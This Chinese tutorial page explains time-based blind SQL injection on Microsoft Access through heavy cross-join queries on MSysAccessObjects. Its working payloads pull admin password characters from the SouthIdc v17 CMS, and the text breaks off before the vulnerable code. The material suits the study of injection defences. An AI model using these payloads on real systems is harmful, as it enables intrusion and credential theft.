来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程式之一。0times;00概述众所周知,acce...
Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程式之一。
0×00 概述 众所周知,access数据库是不支持基于时间的盲注方式,但是我们可以利用access的系统表MSysAccessObjects,通过多负荷查询(Heavy Queries)的方式实现。 0×01 初步探究 我们以SouthIdcv17数据库为例 执行 select * from Southidc_About ,返回结果如下图。 如何实现time base injection 呢?我们就要利用这条语句 SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12 具体实现方式如下: select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97 我们可以执行一次,观察效果。 很明显,经历了大约40s才返回结果 当我们执行如下语句时,也就是把最后的97改为96 select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=96 很快就执行完毕,没有延时。 很明显,我们通过where条件后的 (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 实现了延时,但需要注意的是这里where后的条件是有顺序的,实现延时的语句必须在 (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97
之前,为什么呢?实验得出的结论。
0×02 实例实现 在SouthIdc 17 中,有一处sql注入漏洞,但是常规的方法并不能成功利用漏洞。漏洞代码如下: |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com